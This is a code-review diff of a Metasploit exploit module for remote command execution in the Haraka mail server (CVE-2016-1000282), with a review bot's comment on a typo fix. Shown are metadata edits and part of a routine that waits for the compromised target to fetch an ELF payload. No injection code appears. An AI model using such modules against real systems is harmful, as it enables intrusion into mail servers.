|
1 |
| -## |
2 |
| -# This module requires Metasploit: http://metasploit.com/download |
3 |
| -# Current source: https://github.com/rapid7/metasploit-framework |
4 |
| -## |
5 |
| -# |
6 |
| -# Exploit Title: Harakiri |
7 |
| -# ShortDescription: Haraka comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection |
8 |
| -# Exploit Author: xychix [xychix at hotmail.com] / [mark at outflank.nl] |
9 |
| -# Date: 26 January 2017 |
10 |
| -# Category: Remote Code Execution |
11 |
| -# Vendor Homepage: https://haraka.github.io/ |
12 |
| -# Vendor Patch: https://github.com/haraka/Haraka/pull/1606 |
13 |
| -# Software Link: https://github.com/haraka/Haraka |
14 |
| -# Exploit github: http://github.com/outflankbv/Exploits/ |
15 |
| -# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8 |
16 |
| -# Version: <= Haraka 2.8.8 (with attachment plugin enabled) |
17 |
| -# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS |
18 |
| -# Tested versions: 2.8.8 and 2.7.2 |
19 |
| -# CVE : CVE-2016-1000282 |
20 |
| -# Credits to: smfreegard for finding and reporting the vulnerability |
21 |
| -# Thanks to: Dexlab.nl for asking me to look at Haraka. |
22 |
| -# |
23 |
| -# Disclaimer: |
24 |
| -# This software has been created purely for the purposes of academic research and |
25 |
| -# for the development of effective defensive techniques, and is not intended to be |
26 |
| -# used to attack systems except where explicitly authorized. Project maintainers |
27 |
| -# are not responsible or liable for misuse of the software. Use responsibly. |
28 |
| -# |
29 |
| -# This is to be considered a responsible disclosure due to the availability of an effective patch. |
30 |
| -# |
31 | 1 | #this code is based on:
|
32 | 2 | # https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
|
33 | 3 |
|
@@ -61,7 +31,7 @@ def initialize(info = {})
|
61 | 31 | [ 'URL', 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py'],
|
62 | 32 | [ 'URL', 'https://www.exploit-db.com/exploits/41162/'],
|
63 | 33 | [ 'URL', 'https://github.com/distributedweaknessfiling/DWF-Database-Artifacts/blob/158c10cf11bc7d6ad728c1a8dd213f523ecfca52/DWF/2016/1000282/CVE-2016-1000282.json'],
|
64 |
| - [ 'EDB-ID', '41162'] |
| 34 | + [ 'EDB', '41162'] |
65 | 35 | ],
|
66 | 36 | 'Privileged' => false,
|
67 | 37 | 'Arch' => ARCH_X86,
|
@@ -104,7 +74,7 @@ def wait_linux_payload
|
104 | 74 | select(nil, nil, nil, 1)
|
105 | 75 | waited += 1
|
106 | 76 | if (waited > datastore['HTTP_DELAY'])
|
107 |
| - fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") |
| 77 | + fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it can't connect back to us?") |
108 | 78 | end
|
109 | 79 | end
|
110 | 80 | end
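Review bot: The corrected `fail_with` message in `wait_linux_payload` still contains the doubled word `request request`; this commit only fixes `cant`. The string should read `"#{rhost}:#{rport} - Target didn't request the ELF payload -- Maybe it can't connect back to us?"`. Because this branch fires once the wait exceeds `datastore['HTTP_DELAY']`, `Failure::TimeoutExpired` would describe the outcome more precisely than `Failure::Unknown` for anyone triaging module output. The body of `wait_linux_payload` begins above the hunk, so the loop condition is not visible here.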
|
|